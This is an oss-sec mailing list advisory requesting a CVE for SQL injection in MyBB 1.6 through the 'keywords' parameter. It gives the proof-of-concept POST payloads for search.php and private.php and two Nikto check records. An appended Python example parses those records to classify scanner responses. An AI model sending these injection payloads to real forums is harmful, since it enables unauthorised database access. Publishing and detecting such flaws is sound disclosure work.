oss-sec mailing list archives
CVE Request: MyBB 1.6 <= SQL Injection
From: YGN Ethical Hacker Group <lists () yehg net>
Date: Fri, 18 Mar 2011 14:17:16 +0800
1. OVERVIEW

Potential SQL Injection vulnerability was detected in MyBB.


2. APPLICATION DESCRIPTION

MyBB is a free bulletin board system software package developed by the MyBB Group. It's supposed to be developed from XMB and DevBB bulletin board applications.


3. VULNERABILITY DESCRIPTION

The "keywords" parameter was not properly sanitized in /private.php and /search.php which leads to SQL Injection vulnerability. Full exploitation possibility is probably mitigated by clean_keywords and clean_keywords_ft functions in inc/functions_search.php.


4. VERSIONS AFFECTED

MyBB 1.6 and lower


5. PROOF-OF-CONCEPT/EXPLOIT

=> /search.php

POST /mybb/search.php

action=do_search&forums=2&keywords='+or+'a'+'a&postthread=1

=> /private.php

POST /mybb/private.php

my_post_key=&keywords='+or+'a'+'a&quick_search=Search+PMs&allbox=Check+All&fromfid=0&fid=4&jumpto=4&action=do_stuff

Get nikto check
http://trac2.assembla.com/Nikto_2/browser/trunk/plugins/db_tests?rev=588

Or try nikto udb_tests

"400000","0","9","/search.php","POST","MyBB has experienced an internal SQL error and cannot continue.","","","Sorry, but no results were returned","","MyBB 1.6 <= SQL Injection, ref: http://yehg.net/lab/pr0js/advisories/[mybb1.6]_sql_injection","action=do_search&forums=2&keywords='+or+'a'+'a&postthread=1",""
"400001","0","9","/private.php","POST","MyBB has experienced an internal SQL error and cannot continue.","","","Sorry, but no results were returned","","MyBBx 1.6 <= SQL Injection, ref: http://yehg.net/lab/pr0js/advisories/[mybb1.6]_sql_injection","my_post_key=&keywords='+or+'a'+'a&quick_search=Search+PMs&allbox=Check+All&fromfid=0&fid=4&jumpto=4&action=do_stuff",""


6. SOLUTION

Upgrade to 1.6.1


7. VENDOR

MyBB Development Team
http://www.mybb.com/


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2010-12-09: notified vendor
2010-12-15: vendor released fixed version
2010-12-24: vulnerability disclosed


10. REFERENCES

Original Advisory URL: http://yehg.net/lab/pr0js/advisories/[mybb1.6]_sql_injection
About MyBB: http://www.mybb.com/about/mybb

#yehg [2010-12-24]

---------------------------------
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd
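Added example, not part of the original advisory or of Nikto: a reader for the two udb_tests records above that names each column and applies the record's match and fail strings to a saved response body, which is how an administrator can read what the check reports before and after the upgrade to 1.6.1. The column names are an assumption based on Nikto 2's db_tests layout, the response bodies are constructed, and `classify` is a simplified model of the match logic.

```python
import csv
import io

# Column order of a Nikto db_tests/udb_tests record. Assumption: taken from
# Nikto 2's db_tests header, the advisory itself does not name the columns.
FIELDS = ["test_id", "osvdb_id", "tuning", "uri", "method", "match1",
          "match1_or", "match1_and", "fail1", "fail2", "summary",
          "http_data", "headers"]

# The two udb_tests records, copied verbatim from the advisory.
UDB_TESTS = r'''
"400000","0","9","/search.php","POST","MyBB has experienced an internal SQL error and cannot continue.","","","Sorry, but no results were returned","","MyBB 1.6 <= SQL Injection, ref: http://yehg.net/lab/pr0js/advisories/[mybb1.6]_sql_injection","action=do_search&forums=2&keywords='+or+'a'+'a&postthread=1",""
"400001","0","9","/private.php","POST","MyBB has experienced an internal SQL error and cannot continue.","","","Sorry, but no results were returned","","MyBBx 1.6 <= SQL Injection, ref: http://yehg.net/lab/pr0js/advisories/[mybb1.6]_sql_injection","my_post_key=&keywords='+or+'a'+'a&quick_search=Search+PMs&allbox=Check+All&fromfid=0&fid=4&jumpto=4&action=do_stuff",""
'''

# Constructed response bodies (not captured from a real MyBB install).
BODY_ERROR = "<p>MyBB has experienced an internal SQL error and cannot continue.</p>"
BODY_CLEAN = "<td>Sorry, but no results were returned using the query provided.</td>"
BODY_OTHER = "<title>Forums - Login required</title>"


def load_tests(text):
    """Parse udb_tests text into one dict per record, rejecting short rows."""
    tests = []
    for row in csv.reader(io.StringIO(text.strip())):
        if len(row) != len(FIELDS):
            raise ValueError(f"expected {len(FIELDS)} fields, got {len(row)}")
        tests.append(dict(zip(FIELDS, row)))
    return tests


def classify(test, body):
    """Simplified model of the match/fail logic: fail strings win, then match."""
    if any(test[k] and test[k] in body for k in ("fail1", "fail2")):
        return "not-flagged"
    hit = any(test[k] and test[k] in body for k in ("match1", "match1_or"))
    if hit and (not test["match1_and"] or test["match1_and"] in body):
        return "flagged"
    return "inconclusive"


if __name__ == "__main__":
    for t in load_tests(UDB_TESTS):
        for name, body in [("error", BODY_ERROR), ("clean", BODY_CLEAN), ("other", BODY_OTHER)]:
            print(t["test_id"], t["method"], t["uri"], name, "->", classify(t, body))
```

An "inconclusive" result (for example a login page returned for /private.php) means neither string appeared, so the response says nothing about whether the installation is patched.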